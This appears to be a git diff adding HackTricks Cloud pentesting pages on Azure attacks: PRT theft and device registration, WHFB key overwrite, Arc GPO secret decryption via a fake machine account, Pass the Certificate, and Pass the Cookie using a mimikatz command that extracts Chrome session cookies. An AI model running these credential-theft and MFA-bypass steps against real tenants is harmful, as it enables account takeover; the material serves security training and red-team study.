+{% endhint %} + +## Basic Information + +When a device joins AzureAD a new object is created in AzureAD. + +When registering a device, the **user is asked to login with his account** (asking for MFA if needed), then it request tokens for the device registration service and then ask a final confirmation prompt. + +Then, two RSA keypairs are generated in the device: The **device key** (**public** key) which is sent to **AzureAD** and the **transport** key (**private** key) which is stored in TPM if possible. + +Then, the **object** is generated in **AzureAD** (not in Intune) and AzureAD gives back to the device a **certificate** signed by it. You can check that the **device is AzureAD joined** and info about the **certificate** (like if it's protected by TPM).: + +```bash +dsregcmd /status +``` + +After the device registration a **Primary Refresh Token** is requested by the LSASS CloudAP module and given to the device. With the PRT is also delivered the **session key encrypted so only the device can decrypt it** (using the public key of the transport key) and it's **needed to use the PRT.** + +For more information about what is a PRT check: + +{% content-ref url="az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md" %} +[az-primary-refresh-token-prt.md](az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md) +{% endcontent-ref %} + +### TPM - Trusted Platform Module + +The **TPM** **protects** against key **extraction** from a powered down device (if protected by PIN) nd from extracting the private material from the OS layer.\ +But it **doesn't protect** against **sniffing** the physical connection between the TPM and CPU or **using the cryptograpic material** in the TPM while the system is running from a process with **SYSTEM** rights. 
+ +If you check the following page you will see that **stealing the PRT** can be used to access like a the **user**, which is great because the **PRT is located devices**, so it can be stolen from them (or if not stolen abused to generate new signing keys): + +{% content-ref url="az-lateral-movement-cloud-on-prem/pass-the-prt.md" %} +[pass-the-prt.md](az-lateral-movement-cloud-on-prem/pass-the-prt.md) +{% endcontent-ref %} + +## Registering a device with SSO tokens + +It would be possible for an attacker to request a token for the Microsoft device registration service from the compromised device and register it: + +```bash +# Initialize SSO flow +roadrecon auth prt-init +.\ROADtoken.exe + +# Request token with PRT with PRT cookie +roadrecon auth -r 01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9 --prt-cookie + +# Custom pyhton script to register a device (check roadtx) +registerdevice.py +``` + +Which will give you a **certificate you can use to ask for PRTs in the future**. Therefore maintaining persistence and **bypassing MFA** because the original PRT token used to register the new device **already had MFA permissions granted**. + +{% hint style="success" %} +Note that to perform this attack you will need permissions to **register new devices**. Also, registering a device doesn't mean the device will be **allowed to enrol into Intune**. +{% endhint %} + +{% hint style="danger" %} +This attack was fixed in September 2021 as you can no longer register new devices using a SSO tokens. However, it's still possible to register devices in a legit way (having username, password and MFA if needed). Check: [**roadtx**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md). 
+{% endhint %} + +## Overwriting a device ticket + +It was possible to **request a device ticket**, **overwrite** the current one of the device, and during the flow **steal the PRT** (so no need to steal it from the TPM. For more info [**check this talk**](https://youtu.be/BduCn8cLV1A). + +
+ +{% hint style="danger" %} +However, this was fixed. +{% endhint %} + +## Overwrite WHFB key + +[**Check the original slides here**](https://dirkjanm.io/assets/raw/Windows%20Hello%20from%20the%20other%20side_nsec_v1.0.pdf) + +Attack summary: + +* It's possible to **overwrite** the **registered WHFB** key from a **device** via SSO +* It **defeats TPM protection** as the key is **sniffed during the generation** of the new key +* This also provides **persistence** + +
+ +Users can modify their own searchableDeviceKey property via the Azure AD Graph, however, the attacker needs to have a device in the tenant (registered on the fly or having stolen cert + key from a legit device) and a valid access token for the AAD Graph. + +Then, it's possible to generate a new key with: + +```bash +roadtx genhellokey -d -k tempkey.key +``` + +and then PATCH the information of the searchableDeviceKey: + +
+ +It's possible to get an access token from a user via **device code phishing** and abuse the previous steps to **steal his access**. For more information check: + +{% content-ref url="az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md" %} +[az-phishing-primary-refresh-token-microsoft-entra.md](az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md) +{% endcontent-ref %} + +
+ +## References + +* [https://youtu.be/BduCn8cLV1A](https://youtu.be/BduCn8cLV1A) +* [https://www.youtube.com/watch?v=x609c-MUZ\_g](https://www.youtube.com/watch?v=x609c-MUZ_g) +* [https://www.youtube.com/watch?v=AFay\_58QubY](https://www.youtube.com/watch?v=AFay_58QubY) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-enumeration-tools.md b/pentesting-cloud/azure-security/az-enumeration-tools.md new file mode 100644 index 0000000000..68629756cf --- /dev/null +++ b/pentesting-cloud/azure-security/az-enumeration-tools.md @@ -0,0 +1,160 @@ +# Az - Enumeration Tools + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Install PowerShell in Linux + +{% hint style="success" %} +In linux you will need to install PowerShell Core: + +```bash +sudo apt-get update +sudo apt-get install -y wget apt-transport-https software-properties-common + +# Ubuntu 20.04 +wget -q https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb + +# Update repos +sudo apt-get update +sudo add-apt-repository universe + +# Install & start powershell +sudo apt-get install -y powershell +pwsh + +# Az cli +curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash +``` +{% endhint %} + +## Install PowerShell in MacOS + +Instructions from the [**documentation**](https://learn.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-macos?view=powershell-7.4): + +1. Install `brew` if not installed yet: + +```bash +/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" +``` + +2. Install the latest stable release of PowerShell: + +```sh +brew install powershell/tap/powershell +``` + +3. Run PowerShell: + +```sh +pwsh +``` + +4. Update: + +```sh +brew update +brew upgrade powershell +``` + +## Main Enumeration Tools + +### az cli + +[**Azure Command-Line Interface (CLI)**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli) is a cross-platform tool written in Python for managing and administering (most) Azure and Entra ID resources. It connects to Azure and executes administrative commands via the command line or scripts. + +Follow this link for the [**installation instructions¡**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli#install). 
+ +Commands in Azure CLI are structured using a pattern of: `az ` + +#### Debug | MitM az cli + +Using the parameter **`--debug`** it's possible to see all the requests the tool **`az`** is sending: + +```bash +az account management-group list --output table --debug +``` + +In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can do: + +{% tabs %} +{% tab title="Bash" %} +```bash +export ADAL_PYTHON_SSL_NO_VERIFY=1 +export AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1 +export HTTPS_PROXY="http://127.0.0.1:8080" +export HTTP_PROXY="http://127.0.0.1:8080" + +# If this is not enough +# Download the certificate from Burp and convert it into .pem format +# And export the following env variable +openssl x509 -in ~/Downloads/cacert.der -inform DER -out ~/Downloads/cacert.pem -outform PEM +export REQUESTS_CA_BUNDLE=/Users/user/Downloads/cacert.pem +``` +{% endtab %} + +{% tab title="PS" %} +```bash +$env:ADAL_PYTHON_SSL_NO_VERIFY=1 +$env:AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1 +$env:HTTPS_PROXY="http://127.0.0.1:8080" +$env:HTTP_PROXY="http://127.0.0.1:8080" +``` +{% endtab %} +{% endtabs %} + +### Az PowerShell + +Azure PowerShell is a module with cmdlets for managing Azure resources directly from the PowerShell command line. + +Follow this link for the [**installation instructions**](https://learn.microsoft.com/en-us/powershell/azure/install-azure-powershell). + +Commands in Azure PowerShell AZ Module are structured like: `-Az ` + +#### Debug | MitM Az PowerShell + +Using the parameter **`-Debug`** it's possible to see all the requests the tool is sending: + +```bash +Get-AzResourceGroup -Debug +``` + +In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can set the env variables `HTTPS_PROXY` and `HTTP_PROXY` according to the [**docs**](https://learn.microsoft.com/en-us/powershell/azure/az-powershell-proxy). 
+ +### Microsoft Graph PowerShell + +Microsoft Graph PowerShell is a cross-platform SDK that enables access to all Microsoft Graph APIs, including services like SharePoint, Exchange, and Outlook, using a single endpoint. It supports PowerShell 7+, modern authentication via MSAL, external identities, and advanced queries. With a focus on least privilege access, it ensures secure operations and receives regular updates to align with the latest Microsoft Graph API features. + +Follow this link for the [**installation instructions**](https://learn.microsoft.com/en-us/powershell/microsoftgraph/installation). + +Commands in Microsoft Graph PowerShell are structured like: `-Mg ` + +#### Debug Microsoft Graph PowerShell + +Using the parameter **`-Debug`** it's possible to see all the requests the tool is sending: + +```bash +Get-MgUser -Debug +``` + +### ~~**AzureAD Powershell**~~ + +The Azure Active Directory (AD) module, now **deprecated**, is part of Azure PowerShell for managing Azure AD resources. It provides cmdlets for tasks like managing users, groups, and application registrations in Entra ID. + +{% hint style="success" %} +This is replaced by Microsoft Graph PowerShell +{% endhint %} + +Follow this link for the [**installation instructions**](https://www.powershellgallery.com/packages/AzureAD). diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md new file mode 100644 index 0000000000..5cb58cb86e --- /dev/null +++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md 
@@ -0,0 +1,91 @@ +# Az - Lateral Movement (Cloud - On-Prem) + +## Az - Lateral Movement (Cloud - On-Prem) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +### On-Prem machines connected to cloud + +There are different ways a machine can be connected to the cloud: + +#### Azure AD joined + +
+ +#### Workplace joined + +

https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&name=large

+ +#### Hybrid joined + +

https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&name=large

+ +#### Workplace joined on AADJ or Hybrid + +

https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&name=large

+ +### Tokens and limitations + +In Azure AD, there are different types of tokens with specific limitations: + +* **Access tokens**: Used to access APIs and resources like the Microsoft Graph. They are tied to a specific client and resource. +* **Refresh tokens**: Issued to applications to obtain new access tokens. They can only be used by the application they were issued to or a group of applications. +* **Primary Refresh Tokens (PRT)**: Used for Single Sign-On on Azure AD joined, registered, or hybrid joined devices. They can be used in browser sign-in flows and for signing in to mobile and desktop applications on the device. +* **Windows Hello for Business keys (WHFB)**: Used for passwordless authentication. It's used to get Primary Refresh Tokens. + +The most interesting type of token is the Primary Refresh Token (PRT). + +{% content-ref url="az-primary-refresh-token-prt.md" %} +[az-primary-refresh-token-prt.md](az-primary-refresh-token-prt.md) +{% endcontent-ref %} + +### Pivoting Techniques + +From the **compromised machine to the cloud**: + +* [**Pass the Cookie**](az-pass-the-cookie.md): Steal Azure cookies from the browser and use them to login +* [**Dump processes access tokens**](az-processes-memory-access-token.md): Dump the memory of local processes synchronized with the cloud (like excel, Teams...) and find access tokens in clear text. +* [**Phishing Primary Refresh Token**](az-phishing-primary-refresh-token-microsoft-entra.md)**:** Phish the PRT to abuse it +* [**Pass the PRT**](pass-the-prt.md): Steal the device PRT to access Azure impersonating it. 
+* [**Pass the Certificate**](az-pass-the-certificate.md)**:** Generate a cert based on the PRT to login from one machine to another + +From compromising **AD** to compromising the **Cloud** and from compromising the **Cloud to** compromising **AD**: + +* [**Azure AD Connect**](azure-ad-connect-hybrid-identity/) +* **Another way to pivot from could to On-Prem is** [**abusing Intune**](../az-services/intune.md) + +#### [Roadtx](https://github.com/dirkjanm/ROADtools) + +This tool allows to perform several actions like register a machine in Azure AD to obtain a PRT, and use PRTs (legit or stolen) to access resources in several different ways. These are not direct attacks, but it facilitates the use of PRTs to access resources in different ways. Find more info in [https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/](https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/) + +## References + +* [https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md new file mode 100644 index 0000000000..293feeb63a --- /dev/null +++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md @@ -0,0 +1,97 @@ +# Az - Arc vulnerable GPO Deploy Script + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +### Identifying the Issues + +Azure Arc allows for the integration of new internal servers (joined domain servers) into Azure Arc using the Group Policy Object method. To facilitate this, Microsoft provides a deployment toolkit necessary for initiating the onboarding procedure. Inside the ArcEnableServerGroupPolicy.zip file, the following scripts can be found: DeployGPO.ps1, EnableAzureArc.ps1, and AzureArcDeployment.psm1. + +When executed, the DeployGPO.ps1 script performs the following actions: + +1. Creates the Azure Arc Servers Onboarding GPO within the local domain. +2. Copies the EnableAzureArc.ps1 onboarding script to the designated network share created for the onboarding process, which also contains the Windows installer package. + +When running this script, sys admins need to provide two main parameters: **ServicePrincipalId** and **ServicePrincipalClientSecret**. Additionally, it requires other parameters such as the domain, the FQDN of the server hosting the share, and the share name. Further details such as the tenant ID, resource group, and other necessary information must also be provided to the script. + +An encrypted secret is generated in the AzureArcDeploy directory on the specified share using DPAPI-NG encryption. The encrypted secret is stored in a file named encryptedServicePrincipalSecret. Evidence of this can be found in the DeployGPO.ps1 script, where the encryption is performed by calling ProtectBase64 with $descriptor and $ServicePrincipalSecret as inputs. The descriptor consists of the Domain Computer and Domain Controller group SIDs, ensuring that the ServicePrincipalSecret can only be decrypted by the Domain Controllers and Domain Computers security groups, as noted in the script comments. 
+ +```powershell +# Encrypting the ServicePrincipalSecret to be decrypted only by the Domain Controllers and the Domain Computers security groups +$DomainComputersSID = "SID=" + $DomainComputersSID +$DomainControllersSID = "SID=" + $DomainControllersSID +$descriptor = @($DomainComputersSID, $DomainControllersSID) -join " OR " +Import-Module $PSScriptRoot\AzureArcDeployment.psm1 +$encryptedSecret = [DpapiNgUtil]::ProtectBase64($descriptor, $ServicePrincipalSecret) +``` + +### Exploit + +We have the follow conditions: + +1. We have successfully penetrated the internal network. +2. We have the capability to create or assume control of a computer account within Active Directory. +3. We have discovered a network share containing the AzureArcDeploy directory. + +There are several methods to obtain a machine account within an AD environment. One of the most common is exploiting the machine account quota. Another method involves compromising a machine account through vulnerable ACLs or various other misconfigurations. + +```powershell +Import-MKodule powermad +New-MachineAccount -MachineAccount fake01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose +``` + +Once a machine account is obtained, it is possible to authenticate using this account. We can either use the runas.exe command with the netonly flag or use pass-the-ticket with Rubeus.exe. + +```powershell +runas /user:fake01$ /netonly powershell +``` + +```powershell +.\Rubeus.exe asktgt /user:fake01$ /password:123456 /prr +``` + +By having the TGT for our computer account stored in memory, we can use the following script to decrypt the service principal secret. 
+ +```powershell +Import-Module .\AzureArcDeployment.psm1 + +$encryptedSecret = Get-Content "[shared folder path]\AzureArcDeploy\encryptedServicePrincipalSecret" + +$ebs = [DpapiNgUtil]::UnprotectBase64($encryptedSecret) +$ebs +``` + +Alternatively, we can use [SecretManagement.DpapiNG](https://github.com/jborean93/SecretManagement.DpapiNG). + +At this point, we can gather the remaining information needed to connect to Azure from the ArcInfo.json file, which is stored on the same network share as the encryptedServicePrincipalSecret file. This file contains details such as: TenantId, servicePrincipalClientId, ResourceGroup, and more. With this information, we can use Azure CLI to authenticate as the compromised service principal. + +## References + +* [https://xybytes.com/azure/Abusing-Azure-Arc/](https://xybytes.com/azure/Abusing-Azure-Arc/) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md new file mode 100644 index 0000000000..0b2239549f --- /dev/null +++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md @@ -0,0 +1,65 @@ +# Az - Local Cloud Credentials + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Local Token Storage and Security Considerations + +### Azure CLI (Command-Line Interface) + +Tokens and sensitive data are stored locally by Azure CLI, raising security concerns: + +1. **Access Tokens**: Stored in plaintext within `accessTokens.json` located at `C:\Users\\.Azure`. +2. **Subscription Information**: `azureProfile.json`, in the same directory, holds subscription details. +3. **Log Files**: The `ErrorRecords` folder within `.azure` might contain logs with exposed credentials, such as: + * Executed commands with credentials embedded. + * URLs accessed using tokens, potentially revealing sensitive information. + +### Azure PowerShell + +Azure PowerShell also stores tokens and sensitive data, which can be accessed locally: + +1. **Access Tokens**: `TokenCache.dat`, located at `C:\Users\\.Azure`, stores access tokens in plaintext. +2. **Service Principal Secrets**: These are stored unencrypted in `AzureRmContext.json`. +3. **Token Saving Feature**: Users have the ability to persist tokens using the `Save-AzContext` command, which should be used cautiously to prevent unauthorized access. + +## Automatic Tools to find them + +* [**Winpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASexe) +* [**Get-AzurePasswords.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/AzureRM/Get-AzurePasswords.ps1) + +## Security Recommendations + +Considering the storage of sensitive data in plaintext, it's crucial to secure these files and directories by: + +* Limiting access rights to these files. +* Regularly monitoring and auditing these directories for unauthorized access or unexpected changes. +* Employing encryption for sensitive files where possible. +* Educating users about the risks and best practices for handling such sensitive information. 
+ +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md new file mode 100644 index 0000000000..31e22a7a5d --- /dev/null +++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md @@ -0,0 +1,67 @@ +# Az - Pass the Certificate + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Pass the Certificate (Azure) + +In Azure joined machines, it's possible to authenticate from one machine to another using certificates that **must be issued by Azure AD CA** for the required user (as the subject) when both machines support the **NegoEx** authentication mechanism. + +In super simplified terms: + +* The machine (client) initiating the connection **needs a certificate from Azure AD for a user**. +* Client creates a JSON Web Token (JWT) header containing PRT and other details, sign it using the Derived key (using the session key and the security context) and **sends it to Azure AD** +* Azure AD verifies the JWT signature using client session key and security context, checks validity of PRT and **responds** with the **certificate**. + +In this scenario and after grabbing all the info needed for a [**Pass the PRT**](pass-the-prt.md) attack: + +* Username +* Tenant ID +* PRT +* Security context +* Derived Key + +It's possible to **request P2P certificate** for the user with the tool [**PrtToCert**](https://github.com/morRubin/PrtToCert)**:** + +{% code overflow="wrap" %} +```bash +RequestCert.py [-h] --tenantId TENANTID --prt PRT --userName USERNAME --hexCtx HEXCTX --hexDerivedKey HEXDERIVEDKEY [--passPhrase PASSPHRASE] +``` +{% endcode %} + +The certificates will last the same as the PRT. To use the certificate you can use the python tool [**AzureADJoinedMachinePTC**](https://github.com/morRubin/AzureADJoinedMachinePTC) that will **authenticate** to the remote machine, run **PSEXEC** and **open a CMD** on the victim machine. This will allow us to use Mimikatz again to get the PRT of another user. 
+ +```bash +Main.py [-h] --usercert USERCERT --certpass CERTPASS --remoteip REMOTEIP +``` + +## References + +* For more details about how Pass the Certificate works check the original post [https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
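Review bot: the second bullet of the "In super simplified terms" list mixes verb forms (`Client creates ... sign it ... sends it`) and the first bullet states the result rather than a step, so the list does not read as a sequence; suggest `The client builds a JWT containing the PRT and a certificate request, signs it with the derived key (session key + security context) and sends it to Azure AD`, then `Azure AD validates the signature and PRT and returns the P2P certificate`, and drop the first bullet. Nothing ties the two tool invocations together either: say that `--usercert` for `Main.py` is the PFX written by `RequestCert.py` and `--certpass` the value given as `--passPhrase`, and state that both commands come from the same author (morRubin), since a reader otherwise has to guess how the output of one feeds the other. The prerequisite list should also point at which page/command yields the security context and derived key rather than only linking Pass the PRT.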
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md new file mode 100644 index 0000000000..cdead6bd4b --- /dev/null +++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md @@ -0,0 +1,59 @@ +# Az - Pass the Cookie + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Why Cookies? + +Browser **cookies** are a great mechanism to **bypass authentication and MFA**. Because the user has already authenticated in the application, the session **cookie** can just be used to **access data** as that user, without needing to re-authenticate. + +You can see where are **browser cookies located** in: + +{% embed url="https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts?q=browse#google-chrome" %} + +## Attack + +The challenging part is that those **cookies are encrypted** for the **user** via the Microsoft Data Protection API (**DPAPI**). This is encrypted using cryptographic [keys tied to the user](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) the cookies belong to. You can find more information about this in: + +{% embed url="https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords" %} + +With Mimikatz in hand, I am able to **extract a user’s cookies** even though they are encrypted with this command: + +```bash +mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit +``` + +For Azure, we care about the authentication cookies including **`ESTSAUTH`**, **`ESTSAUTHPERSISTENT`**, and **`ESTSAUTHLIGHT`**. Those are there because the user has been active on Azure lately. + +Just navigate to login.microsoftonline.com and add the cookie **`ESTSAUTHPERSISTENT`** (generated by “Stay Signed In” option) or **`ESTSAUTH`**. And you will be authenticated. 
